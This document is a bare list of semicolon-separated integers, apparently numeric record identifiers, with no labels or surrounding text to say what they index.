142302;142321;142253;142233;142260;142301;142236;142245;142344;142336;142355;142243;142341;142334;142258;142323;142230;142246;142576;142543;142505;142557;142562;142585;142578;142566;142567;142561;142554;142538;142512;142536;142508;142534;142579;142565;142558;142544;142507;142511;142516;142514;142525;142559;142545;142584;142531;142547;142528;142582;142568;142530;142553;143254;143259;143257;143415;143393;143394;143413;143408;143407;143409;143400;143403;143396;143416;143391;143404;143412;143395;143387;143385;143411;143418;143390;143399;143417;143406;143414;143389;143402;144178;144131;144118;144192;144181;144128;144162;144168;144164;144159;144119;144194;144186;144145;144155;144154;144169;144180;144130;144160;144142;144139;144170;144195;144161;144156;144176;144150;144138;144149;144151;144153;144229;144220;144255;144239;144267;144238;144258;144224;144230;144268;144221;144244;144252;144270;144253;144269;144245;144219;144271;144263;144233;144240;144251;144228;144261;144226;144235;144236;144231;144242;144222;144249;144256;144265;144653;144272;144670;144668;144698;144685;144686;144664;144655;144687;144697;144682;144661;144663;144665;144675;144676;144674;144662;144660;144677;144678;144667;144656;144695;144699;144690;144680;144693;144688;144684;144683;144689;144700;144703;144702;144671;144659;144692;144715;144731;144722;144734;144718;144727;144728;144726;144716;144741;144719;144742;144724;144720;144739;144721;144831;144829;145099;145137;145188;145116;145210;145207;145184;145103;145202;145168;145145;145162;145209;145160;145182;145211;145159;145098;145216;145111;145201;145147;145163;145161;145100;145212;145129;145213;145127;145158;145166;145180;145206;145113;145125;145183;145173;145106;145151;145174;145102;145134;145157;145176;145128;145155;145146;145130;145153;145135;145117;145186;145104;145139;145148;145171;145144;145170;145185;145133;145169;145177;145101;145110;145189;145109;145121;145140;145215;145143;145136;145203;145105;145214;145118;145709;145782;145773;145777;145754;145737;145730;145770;145761;145715;145733;145749;145712;145753;145752;145721;145726;145741;145764;145719;145732;145756;145774;145744;145757;145731;145734;145779;145743;145718;145742;145766;145778;145738;145750;145771;145713;145785;145783;145748;145745;145717;145727;145740;145755;145723;146151;146182;146121;146179;146160;146138;146147;146152;146110;146158;146178;146157;146128;146159;146154;146190;146167;146193;146140;146108;146149;146175;146181;146153;146120;146161;146172;146112;146177;146131;146124;146168;146123;146180;146114;146186;146117;146176;146118;146183;146115;146113;146107;146126;146116;146188;146164;146127;146136;146139;146109;146189;146134;146142;146132;146165;146143;146150;146169;146148;146173;146185;146171;146246;146236;146252;146218;146239;146217;146230;146235;146229;146263;146226;146255;146225;146227;146222;146240;146219;146253;146245;146237;146254;146224;146231;146261;146250;146228;146249;146262;146256;146232;146258;146259;146238;146251;146243;146220;146257;146732;146221;146678;146710;146767;146764;146680;146647;146742;146734;146697;146702;146753;146741;146644;146738;146713;146754;146765;146655;146659;146686;146687;146705;146646;146650;146671;146668;146744;146704;146739;146641;146701;146651;146707;146696;146752;146708;146660;146675;146681;146709;146731;146743;146664;146663;146684;146672;146727;146728;146645;146703;146740;146733;146747;146690;146642;146698;146652;146692;146682;146711;146656;146694;146760;146761;146706;146679;146719;146722;146661;146714;146674;146712;146723;146762;146693;146730;146748;146717;146720;146670;146657;146758;146721;146695;146759;146716;146648;146756;146755;146766;146658;146654;146724;146683;146735;147480;147546;147587;147542;147530;147505;147455;147492;147608;147477;147588;147536;147456;147582;147471;147583;147430;147552;147513;147539;147614;147499;147613;147600;147596;147487;147453;147526;147540;147431;147457;147423;147574;147472;147531;147462;147607;147533;147549;147479;147577;147573;147580;147557;147527;147468;147478;147458;147547;147422;147520;147516;147427;147503;147541;147448;147535;147442;147428;147534;147521;147465;147569;147566;147449;147466;147590;147585;147599;147538;147598;147446;147603;147474;147493;147491;147611;147444;147559;147490;147562;147467;147460;147451;147616;147438;147595;147525;147551;147605;147561;147507;147459;147619;147517;147489;147443;147432;147461;147495;147424;147592;147433;147425;147555;147584;147518;147475;147601;147441;147510;147609;147528;147114;147118;147081;147129;147035;147124;147045;147117;147100;147042;147029;147126;147088;147074;147046;147125;147102;147049;147080;147054;147064;147132;147131;147105;147092;147028;147041;147057;147040;147119;147107;147061;147079;147122;147055;147066;147130;147104;147128;147110;147103;147089;147043;147084;147069;147032;147038;147047;147065;147095;147083;147094;147077;147090;147109;147031;147111;147052;147112;147093;147063;147123;147133;147044;147071;147059;147097;147073;147053;147037;147056;147120;147113;147039;147085;147075;147051;147033;147072;147062;147096;147058;147078;147070;147115;147127;147048;147025;147076;147121;147099;147036;147067;147082;147101;147106;147034;147091;147108;147086;147581;147560;147473;147578;147615;147504;147604;147470;147543;147508;147488;147594;147602;147445;147553;147589;147512;147486;147610;147572;147434;147567;147593;147439;147501;147440;147550;147483;147514;147522;147537;147426;147496;147556;147485;147494;147482;147565;147506;147617;147497;147509;147481;147523;147476;147670;147672;147668;147666;147686;147664;147683;147679;147690;147681;147673;147702;147703;147674;147669;147696;147693;147676;147677;147694;147701;147699;147689;147665;147692;147675;147698;147671;147667;147691;147687;147684;147678;147700;147682;147695;148067;148077;148043;148050;148046;148055;148082;148057;148062;148059;148084;148060;148047;148073;148075;148041;148065;148079;148083;148049;148044;148056;148076;148052;148058;148074;148069;148086;148078;148063;148042;148061;148071;148054;148068;148064;148048;148081;148070;148040;148576;148589;148582;148630;148634;148618;148580;148628;148620;148597;148631;148638;148596;148626;148605;148611;148625;148619;148612;148585;148598;148608;148601;148607;148613;148602;148583;148595;148633;148575;148635;148629;148577;148627;148586;148624;148637;148603;148579;148622;148587;148609;148604;148621;148584;148617;148591;148592;148581;148616;148578;148593;148640;148590;148632;149116;149096;149165;149161;149102;149107;149097;149175;149197;149176;149190;149130;149153;149154;149147;149095;149144;149182;149124;149137;149177;149155;149178;149171;149187;149140;149148;149166;149186;149104;149115;149173;149110;149141;149157;149156;149114;149134;149111;149183;149158;149149;149131;149200;149098;149109;149118;149117;149170;149125;149184;149194;149202;149132;149198;149129;149169;149099;149143;149100;149201;149136;149168;149167;149160;149163;149159;149139;149120;149128;149188;149122;149123;149108;149105;149119;149146;149204;149196;149112;149101;149106;149162;149142;149126;149121;149127;149133;149181;149189;149145;149164;149150;149193;149199;149192;149172;149151;149138;149191;149565;149588;149583;149615;149625;149563;149622;149582;149559;149552;149601;149576;149597;149543;149531;149607;149551;149556;149532;149595;149623;149544;149561;149638;149591;149626;149632;149538;149618;149575;149585;149624;149540;149619;149631;149593;149599;149586;149617;149604;149587;149610;149606;149574;149581;149620;149608;149547;149578;149621;149630;149592;149546;150167;150192;150170;150216;150166;150227;150181;150174;150208;150210;150189;150214;150197;150225;150224;150221;150198;150175;150184;150211;150217;150231;150229;150178;150187;150226;150179;150186;150204;150219;150176;150169;150213;150177;150202;150209;150195;150185;150188;150207;150205;150199;150247;150250;150263;150278;150277;150265;150254;150271;150264;150252;150268;150253;150258;150249;151039;151031;151045;151052;151043;151040;151048;151032;151042;151026;151033;151041;151034;151029;151046;151036;151047;151038;151035;151161;151171;151174;151169;151180;151172;151157;151182;151185;151167;151175;151166;151173;151178;151177;151176;151179;151162;151156;151184;151183;151160;151186;151170;151168;151163;151159;151164;151181;151165;151158;151232;151257;151256;151221;151249;151228;151250;151258;151242;151245;151223;151237;151244;151233;151235;151227;151229;151236;151222;151263;151259;151231;151220;151248;151262;151246;151230;151238;151225;151260;151247;151234;151251;151241;151252;151255;151243;151240;151239;151253;151254;151261;151226;151224;151297;151344;151324;151294;151336;151314;151325;151307;151348;151330;151299;151326;151331;151349;151332;151323;151337;151327;151320;151295;151342;151316;151312;151311;151313;151317;151296;151319;151340;151334;151329;151321;151350;151341;151303;151338;151322;151335;151302;151310;151345;151328;151300;151304;151347;151339;151305;151315;151301;151298;151308;151343;151318;151306;151351;151309;151333;151415;151388;151902;151392;151896;151420;151421;151399;151895;151408;151398;151381;151402;151382;151400;151419;151397;151409;151894;151389;151414;151416;151404;151898;151417;151379;151391;151384;151385;151405;151394;151395;151418;151380;151411;151387;151412;151376;151401;151393;151390;151383;151406;151386;151413;151378;151396;151403;151568;151556;151544;151537;151560;151563;151538;151536;151565;151562;151548;151534;151549;151547;151558;151535;151552;151533;151564;151541;151543;151570;151545;151561;151551;151555;151550;151540;151569;151553;151559;151566;151542;151539;151546;151567;151554;151768;151557;151782;151788;151769;151773;151776;151766;151785;151774;151779;151767;151783;151787;151781;151772;151777;151784;151786;151789;151780;151770;151771;151775;152336;152309;152343;152279;152334;152321;152295;152303;152274;152324;152302;152308;152319;152331;152294;152289;152340;152314;152275;152328;152338;152330;152304;152316;152284;152345;152293;152276;152299;152296;152337;152310;152342;152290;152326;152277;152339;152317;152313;152292;152286;152305;152287;152311;152285;152315;152280;152333;152281;152323;152307;152298;152306;152301;152344;152278;152282;152329;152325;152320;152341;152312;152300;152332;152318;152327;152322;152291;152283;152297;152335;152408;152400;152409;152396;152403;152399;152404;152397;152407;152402;152405;152406;152401;153064;153067;153052;153084;153058;153070;153049;153048;153079;153085;153076;153053;153063;153071;153054;153057;153075;153080;153078;153081;153086;153068;153059;153065;153082;153066;153055;153077;153050;153051;153056;153060;153357;153069;153262;153289;153333;153346;153318;153339;153313;153328;153314;153276;153298;153287;153295;153270;153338;153280;153311;153264;153323;153342;153319;153290;153281;153312;153275;153305;153348;153301;153355;153279;153292;153316;153302;153273;153268;153272;153359;153299;153320;153354;153271;153260;153300;153340;153315;153358;153329;153324;153308;153332;153331;153297;153347;153349;153343;153327;153309;153353;153307;153261;153321;153330;153293;153288;153326;153266;153360;153306;153344;153282;153325;153263;153274;153304;153283;153317;153294;153322;153334;153337;153286;153296;153352;153267;153335;153350;153345;153284;153356;153336;153310;153278;153341;153277;153303;153269;153291;153259;153351;153265;153606;153634;153628;153648;153633;153651;153629;153653;153657;153642;153607;153664;153610;153650;153640;153639;153638;153660;153644;153609;153602;153603;153662;153608;153641;153637;153604;153663;153646;153654;153655;153649;153645;153661;153656;153647;153659;153714;153717;155469;153739;153747;153715;153730;153697;153673;153755;153692;153758;153732;153746;153681;153708;153719;153675;153693;153688;153720;153726;153700;153718;153735;153761;153716;153671;153680;153760;153677;153713;153698;153674;153740;153734;153721;153682;153703;153749;153672;153728;153686;153737;153759;153754;153704;153722;153695;153687;153738;153710;153701;153712;153733;153702;153711;153736;153683;153684;153678;153679;153731;153706;153748;153707;153696;153676;153699;153729;153727;153724;153685;153705;153670;153723;154000;154001;154371;154393;154398;154403;154363;154365;154399;154407;154372;154364;154397;154361;154362;154359;154375;154411;154388;154404;154385;154373;154392;154389;154387;154358;154396;154390;154400;154401;154391;154367;154386;154406;154409;154394;154382;154380;154402;154379;154360;154366;154378;154395;154377;154369;154383;154376;154374;154370;153658;154408;154384;154357;154368;154788;154795;154799;154810;154794;154811;154786;154787;154807;154789;154792;154793;154805;154813;154796;154812;154790;154803;154801;154785;154809;154802;154791;154797;154804;154798;154806;154800;155281;155267;155269;155285;155280;155286;155288;155139;155141;155272;155140;155273;155283;155142;155279;155240;155284;155287;155266;155290;155242;155275;155235;155270;155282;155265;155248;155138;155131;155260;155251;155277;155117;155239;155291;155271;155237;155129;155261;155262;155268;155238;155228;155241;155229;155246;155120;155230;155244;155247;155278;155257;155255;155118;155236;155259;155263;155264;155276;155254;155256;155250;155119;155121;155233;155128;155249;155289;155252;155227;155258;155253;155130;155274;155243;155226;155234;155504;155521;155480;155231;155500;155478;155488;155535;155508;155490;155514;155516;155481;155510;155532;155477;155512;155534;155476;155460;155506;155494;155518;155489;155530;155484;155475;155509;155529;155503;155531;155472;155513;155479;155519;155526;155485;155473;155515;155507;155524;155491;155533;155492;155527;155498;155474;155537;155495;155487;155520;155502;155517;155497;155522;155536;155505;155528;155496;155501;155493;155471;155511;155523;155482;155486;155499;155525;155483;156306;156294;156298;156312;156296;156305;156311;156302;156301;156304;156303;156308;156295;156313;156307;156299;156310;156293;156309;156300;156297;156347;156373;156344;156350;156372;156351;156365;156362;156357;156358;156354;156367;156359;156383;156374;156355;156343;156371;156369;156360;156352;156346;156379;156378;156381;156382;156349;156364;156376;156348;156363;156356;156353;156368;156377;156366;156345;156536;156489;156518;156534;156508;156490;156535;156533;156529;156510;156516;156519;156487;156509;156530;156506;156507;156491;156527;156513;156520;156495;156504;156492;156522;156541;156498;156540;156532;156511;156494;156524;156521;156537;156526;156488;156531;156502;156496;156493;156517;156497;156539;156500;156514;156525;156538;156523;156515;156505;156528;156501;156552;156503;156512;156499;156542;156414;156413;156404;156407;156400;156408;156409;156415;156412;156401;156416;156410;156406;156411;156402;156405;156423;156424;156430;156428;156429;156425;156431;156432;156438;156427;157209;157192;157169;157206;157193;157212;157186;157217;157179;157178;157203;157208;157171;157170;157194;157187;157219;157197;157216;157195;157211;157173;157196;157204;157184;157175;157177;157191;157218;157220;157207;157213;157222;157172;157200;157174;157210;157201;157215;157185;157925;157926;157927;157922;157928;157924;157923;157916;157912;157913;157915;157917;157918;157914;157941;157955;157991;157983;157947;157950;157979;157964;158023;157984;157980;157951;157978;158011;157958;158025;158016;157954;158005;157969;157972;157981;158018;158007;157990;157949;157940;158020;158002;158019;158009;157937;157944;158012;157987;158017;157946;158000;157965;158003;157971;157976;157966;158024;157988;157998;158006;157985;157942;157970;158027;157959;157992;157977;158028;158001;158013;157956;157962;157999;157933;158010;157993;157973;157986;157945;158021;157994;157997;157974;158014;157934;157996;157930;157982;157995;158008;157952;157967;158029;157989;157960;157963;157943;158022;157957;157975;157968;157936;157931;158015;157961;158030;157953;158004;157948;158040;158313;158310;158300;158282;158306;158302;158274;158317;158289;158299;158276;158311;158294;158318;158284;158288;158293;158312;158320;158297;158292;158309;158295;158280;158298;158279;158301;158303;158285;158277;158286;158290;158278;158291;158283;158304;158281;158275;158315;158287;158308;158296;158419;158314;158405;158399;158421;158413;158374;158426;158432;158396;158422;158365;158424;158397;158423;158369;158394;158407;158412;158373;158428;158379;158382;158391;158388;158434;158372;158371;158409;158408;158406;158414;158363;158410;158385;158431;158384;158393;158398;158376;158427;158362;158386;158420;158416;158370;158411;158380;158381;158400;158425;158377;158404;158418;158401;158417;158387;158367;158378;158375;158364;158366;158493;158482;158476;158477;158491;158484;158469;158465;158483;158472;158481;158480;158486;158485;158462;158470;158478;158466;158487;158468;158490;158461;158479;158532;158533;158526;158553;158552;158529;158538;158524;158534;158548;158550;158523;158551;158531;158536;158530;158525;158544;158547;158540;158539;158542;158541;158543;158537;158535;158522;158545;158549;158527;158546;158528;159104;159082;159094;159081;159080;159084;159085;159101;159095;159102;159086;159093;159096;159087;159083;159091;159103;159089;159099;159100;159088;10003;10002;11275;10004;11319;11509;10585;11880;11854;11855;11881;15405;11166;10957;10522;11155;11558;11417;10988;10005;15553;10716;10006;10794;10442;11101;11085;11221;111845;121646;111846;121647;121648;121649;121650;121651;121652;121653;121654;111847;121655;121656;121657;111848;121658;121659;111849;121660;121661;121662;111850;121663;121665;121664;111851;121666;111852;121667;121668;121669;111853;121670;111854;121671;111855;121672;121673;111856;121674;111857;111858;121675;111859;121676;121677;121678;111860;121679;121680;111861;111862;121681;121682;121683;121684;121685;111863;121686;111864;121687;121688;121689;121690;111865;121691;121692;121693;121694;111866;121695;121696;111867;121697;111868;121698;111869;121699;111870;121700;121701;121702;121703;121704;111871;121705;111872;121706;121707;121708;121709;121710;111873;121711;121713;121712;111874;121714;121715;121716;121717;111875;121718;121719;121720;111876;111877;121721;121722;111878;121724;121723;121725;111879;121726;121727;111880;121728;111881;121729;111882;121730;111883;121731;121732;111884;121733;111885;121734;111886;121735;121736;111887;111888;121737;121738;121739;121740;111889;121741;121742;121743;121744;121745;121746;121747;111890;121749;121748;121750;121751;111891;121752;121753;111892;111893;121754;121756;121755;121757;121758;121759;111894;121760;121761;121762;121763;121764;111895;121765;111896;121766;111897;111898;121767;111899;121768;121769;121770;111900;121771;121772;121773;121774;121775;111902;111901;121776;121777;121778;111903;121779;121780;121782;121781;111904;121783;121785;121784;121787;121786;121788;111905;121789;121790;111906;121791;121792;121793;111907;121794;121795;111908;121796;111909;121797;111910;121798;121799;121800;111911;121801;111912;111913;121802;111914;121803;111915;121804;111916;121805;121806;111917;111918;121807;111919;121808;121809;111920;121810;121811;111921;121812;111922;121813;111923;121814;111924;121815;111925;121816;111926;121817;111927;121818;121819;111928;111929;121820;111930;121822;121821;121823;121824;121825;121826;121827;121828;121829;121830;121831;111931;121832;121833;111932;121834;121835;111933;121836;121837;111934;121838;111935;121839;111936;121840;111937;121841;111270;111271;121842;111272;121843;111273;121844;111274;121845;121846;111275;121848;121847;111276;121849;121850;111277;121851;111938;121852;111939;121853;111940;121854;111941;121855;111942;121856;111943;121857;111944;121858;121859;111945;121860;111946;121861;121862;121863;121864;121865;121866;121867;111947;121868;111948;121869;111949;121870;121871;121872;121873;111950;121874;121875;121876;112034;121877;121878;112221;121879;121880;121881;121882;112223;121883;121884;117336;121885;117396;121886;121887;117633;121888;117637;121889;117881;121890;118208;121891;118494;121892;121893;121894;121895;121896;121897;119749;121899;121898;121900;111278;121901;121902;121903;121904;111279;121905;111280;121906;111281;121907;121908;111282;121909;111283;121910;121911;121912;111284;121913;111285;121914;111286;121915;121916;121917;121918;121919;111287;121920;121921;121922;111288;121923;111289;121924;111290;121925;111291;121926;111292;121927;121928;111293;121929;121930;111294;121931;111295;121932;121933;111296;111297;111298;121934;121935;121936;121937;121938;121939;111299;121940;111300;121941;121942;121943;111301;111302;121944;121945;111303;121946;111304;121947;121948;111305;121950;121949;121951;111306;121952;111307;121953;111308;121954;121955;111309;121956;121957;121958;111310;121959;111951;121961;121960;111952;121962;111953;111954;121963;111955;121964;121965;111956;121966;111957;111958;121967;121968;111959;121969;121970;111960;121971;121972;121973;111961;121974;111962;121975;111963;121976;121977;111964;121978;121979;112062;121980;121981;112035;121982;121983;112224;121984;121985;121986;121987;112220;121988;112222;121990;121989;117399;117397;121991;121992;121993;117634;121994;117638;121995;118209;119423;121996;121997;118308;121998;121999;122000;122001;122002;122003;122004;122005;122006;122007;122008;122009;119753;122010;119750;122011;122012;122013;122014;122015;122016;122017;122018;122019;122020;122021;122022;122898;122899;122900;122901;122902;122903;122904;122905;133296;133297;133298;133299;133300;122894;122920;122895;122921;122922;122923;122924;122925;122926;125161;125162;125156;125157;125158;125159;125160;125155;125084;125085;125086;125088;125089;124862;124863;124864;124865;124866;124868;124867;124869;124870;125083;125400;125402;125401;125403;126120;126121;126122;126124;126123;126194;126195;126196;126197;126198;126199;126200;126201;126202;126204;126203;126190;126205;126185;126186;126187;126188;126189;126176;126177;126178;126478;126470;126472;126471;126955;126954;128166;128167;128168;128169;128170;128171;128172;128173;128163;128164;128165;128758;128726;128727;128759;128709;128710;129294;129293;129783;129784;129785;129786;129787;129789;129788;130109;130108;129681;129682;129683;129685;129684;129686;129687;132521;132522;132523;132524;132525;132527;132526;132528;132519;132520;132695;132694;132696;132963;132964;132965;132966;132967;132968;132969;122023;122024;122025;122026;122027;122028;122030;122029;122031;122896;122897;122910;122911;122906;122907;122909;122908;122915;122914;122916;122917;122918;122912;122913;122919;124861;125087;126212;126213;126214;126215;125075;126216;125076;125077;125078;125079;125080;125081;125082;124680;124681;125393;125394;125395;125396;125398;125397;125399;126209;126210;126211;126179;126180;126181;126182;126106;126107;126108;126109;126110;126473;128174;128714;128175;128715;128717;128716;128718;128719;128720;128721;128722;128723;128711;128712;128713;128734;128735;128736;128737;128738;129295;129296;129689;129690;129691;129692;129693;129688;130114;130115;130116;130117;130118;130107;130203;130204;130205;130206;131125;132540;132541;132542;132544;132545;132546;132543;132537;132538;132531;132539;132532;132533;132534;132535;131763;132536;132677;132970;132972;132971;132973;132974;132975;132976;132977;132978;126377;126376;126378;126379;126380;126111;126112;126113;126114;126116;126115;126117;126206;126208;126207;126192;126191;126193;126183;126474;126184;128151;128152;128153;128154;128155;128156;128157;128158;128159;128160;128161;128162;128729;128739;128730;128731;129102;128732;128733;129103;128728;129678;129679;129680;129164;129163;129165;130124;130125;130126;130112;130111;130110;130113;130120;130119;130121;130122;130123;130101;130102;130103;130104;130105;130106;132589;132529;132530;131762;133227;133061;132979;133062;132980;132982;132981;132983;132984;132985;132986;133301;133302;133469;133470;133503;133501;133502;133683;133684;133685;133812;133811;134040;134041;134206;134207;134208;134424;134425;134426;134835;135494;135484;135483;135486;135485;135487;135488;135489;135490;135491;135492;135493;136030;136031;136032;136033;136034;136035;136037;136036;136104;136106;136105;136107;136108;136109;136405;136110;136406;136552;136553;136554;136555;136556;136557;136548;136549;136550;136551;136693;136695;136694;137057;137323;137317;137318;137319;137320;137321;137322;137316;137643;137637;137644;137638;137639;137640;137641;137642;137776;137875;137781;137877;137876;138441;137878;138442;138443;138519;138517;138516;138518;139046;139047;139048;139049;139050;139051;139079;139080;139081;139242;139509;139510;139696;139697;139702;139700;139864;140113;140413;140125;141638;141639;141640;140459;140495;140710;140711;140718;141096;141091;141441;141439;141476;141440;141478;141480;141860;141644;143063;141859;143065;143061;143062;143064;143066;143060;143363;143444;144062;144061;144082;144521;144520;144517;144518;144519;132987;132988;132989;132990;133262;133263;133264;133466;133500;133499;133686;133687;133688;133689;133803;133802;134085;134084;134086;134422;134423;134427;134875;135301;135306;135302;135307;135308;135309;135310;135303;135305;135304;135298;135299;135863;135865;135864;135866;135867;135868;135870;135869;135877;135906;135907;136092;136332;136331;136334;136333;136335;136336;136337;136328;136330;136329;136327;136326;136407;136408;136567;136409;136568;136569;136570;136571;136572;136697;136901;137328;137329;137197;137198;137191;137193;137192;137194;137195;137302;137196;137303;137712;137714;137713;137717;137716;137718;137719;137873;137874;138190;138191;138192;138184;138189;138179;138180;138513;138520;138515;138814;138815;139052;139053;139054;139056;139055;139057;139058;139075;139513;139243;139514;139611;139608;139609;139610;139728;139863;139865;139866;140114;140122;140116;140115;140661;140117;140662;140663;140664;140536;140709;140712;140704;140713;140714;140715;140716;141090;141444;141098;141442;141445;141443;141477;141475;141643;141642;141858;142652;142653;142985;142986;142989;142987;142988;142991;143245;143244;143362;143446;143487;143488;144072;144071;144217;133063;133064;133065;133066;133067;133068;133069;133060;133209;133467;133295;133468;133498;133504;133505;133506;133806;133807;133808;133809;133810;133804;133805;133957;133956;134209;134210;134211;134212;134873;134874;135402;135403;134872;135404;135406;135405;135300;135779;135781;135780;135782;135783;135784;135785;135786;135787;135789;135790;135792;135791;135793;135777;135778;135871;135872;135873;136093;136094;136095;136096;136097;136098;136099;136345;136100;136346;136573;136574;136576;136575;136577;136578;136579;136580;136581;136696;136698;136699;137199;137189;137190;137187;137188;137200;137201;137202;137721;137720;137722;137724;137723;137725;137783;137782;137784;137777;137778;137779;137780;138181;138182;138183;138188;138514;138521;138812;138813;138817;138816;139043;139044;139045;139076;139077;139512;139078;139612;139698;139699;139729;140118;140126;140112;140408;140409;140410;140411;140412;140457;140537;140580;140703;140702;140705;140706;140708;140707;140785;141094;141093;141481;141496;141495;141866;141867;141864;141865;142215;142658;142656;142655;142657;142654;142990;143379;143248;143247;143250;143251;143252;143358;143447;143448;144065;144067;144064;144069;144068;144077;144076;144514;144218;144516;144513;144901;144515;144896;145232;145231;145420;145233;145419;145699;145411;146482;146773;146772;146864;146863;146862;146878;146877;147008;147007;147004;147005;147006;147825;147822;147950;147952;147954;148128;148294;148282;148284;148283;148338;148814;148818;148809;148817;148823;148904;148905;149058;149290;149827;149919;149921;149920;149950;149949;150035;149951;150046;150047;150243;150241;150287;150439;150749;150922;150924;150284;150923;150944;151437;151436;151962;151197;151952;151953;151951;151950;152014;152053;152052;152051;152092;152381;152370;152386;152556;152368;152787;152785;152793;152883;152878;152884;153031;153498;153506;153503;153691;153689;153690;153958;153935;153938;153957;153929;153975;155329;155328;144895;155850;144893;144894;144891;144892;144898;145421;145418;145417;145459;145416;145695;145694;146483;146484;146487;146774;146771;146769;146770;146876;147002;147000;147001;147949;147948;147824;147823;147819;147818;147951;147955;148186;148290;148289;148288;148286;148287;148340;148339;148811;148824;148822;148821;148820;148902;149057;149294;149838;149284;149831;149832;149926;149925;150072;150070;150069;150071;150424;150442;150423;150438;150441;150288;150751;150925;150926;150931;150932;150930;153933;151196;151435;151961;150998;151966;152016;152015;152050;152084;152085;152090;152371;152369;152373;152558;152797;152789;152792;152880;152882;153038;152881;153042;153043;153493;153491;153742;153505;153744;153743;153757;153756;153962;153934;153963;153956;153928;153955;153980;153979;154025;155330;155331;155347;155851;144900;144899;144902;145230;145415;145414;145413;145412;145693;145696;146067;146440;146485;146486;146775;146776;146777;146778;146875;146873;146874;146998;146997;146999;146996;146995;147820;147821;147953;148190;148129;148191;148189;148192;148344;148292;148293;148291;148285;148341;148342;148812;148813;148901;148900;148907;148908;149052;149048;149285;149292;149293;149283;149291;149295;149289;149288;149823;149829;149828;149819;149833;149820;149821;149930;149945;149944;150039;150040;150041;150067;150240;150068;150239;150285;150435;150444;150445;150286;150917;150916;150915;150909;150908;150910;150911;150929;153184;153185;151438;151439;151016;151644;151957;151949;151956;151955;151958;151959;152054;152083;152385;152372;152380;152388;152379;152374;152502;152557;152560;152794;152788;152886;152885;153032;153033;153045;153041;153040;153497;153492;153501;153500;153499;153751;153753;153750;153990;153752;153939;153961;153960;153945;153946;153986;153988;155310;155309;155319;155321;153987;155320;155852;156583;156584;156587;156585;156586;156588;148023;148024;148025;148026;148030;148029;148027;148028;148353;148345;148356;148352;148347;148349;148354;148350;148357;148351;148355;148346;148348;148816;148815;148909;148910;149054;149053;149050;149051;149287;149286;149830;149437;149826;149836;149837;149825;149824;149952;149953;150036;150038;150037;150042;150043;150066;150237;150236;150235;150437;150443;150750;150933;150283;150934;150918;150921;150919;150920;150907;153937;153936;151014;151434;151015;151433;151645;151946;151947;151945;151963;151967;151960;151964;151965;152091;152082;152378;152377;152375;152376;152387;152500;152499;152501;152492;152559;152791;152786;152790;152796;152879;153036;153037;153039;153034;153044;153035;153504;153496;153495;153502;153494;153725;153745;153930;153927;153974;153973;153972;155313;153971;155327;155326;155322;155853;156589;156578;156582;156577;156580;156581;156579;156592;156591;128724;156590;128725;10921;18182;10920;11321;11378;11367;11171;10007;11345;54848;54849;54850;54851;54853;54852;54854;54855;54856;18714;18716;18713;37391;18715;18720;18723;18721;18741;18729;18719;18724;18717;18722;54862;18736;18733;18730;18727;18726;18739;18728;18740;18732;18731;18742;18743;18712;18734;18735;18725;18795;18786;18784;18755;18750;18772;18771;18789;18770;18785;18783;18765;18769;18758;18768;18792;18756;18747;18751;18762;18787;18761;18763;18790;18778;18779;18791;18773;18774;18777;18764;18781;37950;18794;18749;18754;18767;18753;18759;18748;18782;18752;18757;18744;18766;18746;18776;18745;18780;18760;18793;18788;18812;18775;18807;18804;18811;18798;18806;18810;18809;18800;18808;18796;18801;18802;18803;18799;18805;18797;19209;19208;19850;19851;19852;19853;19854;19855;19856;19858;19857;19860;19859;19862;19861;54863;19863;19865;19864;19866;19951;19867;19952;20017;20149;20150;54864;20151;20152;54865;20163;20912;20913;20914;20915;20916;20917;20918;20919;20920;21074;21075;21248;21121;21272;21314;21342;21343;21344;21345;21346;21583;21584;21639;21640;21699;21765;21766;21767;22050;22081;22098;22099;22100;22101;22102;24656;22152;22153;22170;22236;22237;54866;22348;22349;22420;22421;22468;22467;24657;23653;24658;54867;23654;24659;24661;24660;24662;23940;23939;24663;24664;24665;24667;24666;24668;24691;24787;24788;24789;24791;24790;24792;24915;24914;24916;24917;24918;25092;25093;25174;25094;25222;25253;25373;25771;25374;25772;25773;25774;25775;25776;25831;54868;25844;25843;25845;25846;25847;25848;25907;25957;26053;26054;26055;26113;26202;26972;27537;27609;28147;28148;28277;28149;28294;28295;28296;28362;28335;29188;29189;29254;31027;29704;31053;31099;31100;31101;31324;31323;31706;31707;31739;31708;31740;31801;31802;31803;31994;32056;32033;32083;32444;32445;32455;32446;33287;33288;33465;33398;54869;33466;33533;33534;33746;33565;33747;33748;33749;33750;33751;33752;33753;33754;33755;33824;33825;34061;34086;34295;34296;34300;34719;34782;34731;34784;34783;34785;34822;34852;34972;34971;35223;35035;35282;35274;35292;35376;54870;35377;54871;35577;35601;35636;35727;35728;35826;35825;35827;36009;36010;36037;36011;36038;36104;36105;36106;36145;36186;36573;36206;38166;38201;38655;38719;38720;38778;38915;39008;39421;39422;39472;39473;39522;39559;39560;39567;40408;39796;40459;54872;40473;40503;40511;40512;40513;40598;40622;40623;40669;40624;40877;40977;54873;42168;41972;42169;42293;42294;42341;42826;54874;43102;54875;43112;43638;43353;44120;44121;44122;50435;44946;44947;44994;45007;45024;54876;45400;54877;45425;45424;45426;45581;54878;45611;46345;46358;47047;54879;54880;47141;54881;54882;47562;47563;47786;54883;47787;54884;48920;48919;54885;48922;48921;48923;49177;54886;49178;49229;49230;49238;54887;49290;50308;54888;54889;50353;50388;54890;50427;54891;54892;50436;50661;50660;50832;50668;54893;51063;54894;54895;51126;51371;51372;51386;51940;51451;51941;51942;51943;51944;52165;52460;52599;54896;54897;52635;52636;52996;54899;54898;53298;53361;54900;53362;54901;54902;53476;54903;53515;54905;54904;53626;53898;53899;54649;54648;54906;55173;55423;55703;55704;55705;55706;55707;55736;55735;55834;55737;55980;56092;56093;56094;56142;56513;57893;57892;57894;57896;57895;59478;59508;59507;59509;59686;59510;59970;59971;60050;60051;60052;60087;60053;60141;60112;61553;61552;61748;61660;61749;61750;61751;61752;62079;62080;62102;62483;62469;62500;62501;62549;62719;62761;62762;63002;63003;63004;63167;63168;63169;63479;63170;63480;63481;63555;63647;64491;64535;64590;64622;64727;64728;64879;64970;65060;65176;65177;65552;65553;65583;65705;65660;65706;65724;65943;65944;65945;66158;65946;66449;66450;66483;66484;66638;66967;66850;67009;67115;67116;67234;68916;69196;69224;69225;69226;69242;69243;69244;69431;69433;69432;69519;69520;69521;69818;69935;69957;69958;70199;70437;70438;70439;70440;70441;70499;70500;70738;70951;70952;70953;70954;71232;71233;71234;71235;71467;71468;71469;71470;71471;71472;71473;71573;71929;71930;71931;71932;72188;72187;72265;72398;72399;72400;72488;72489;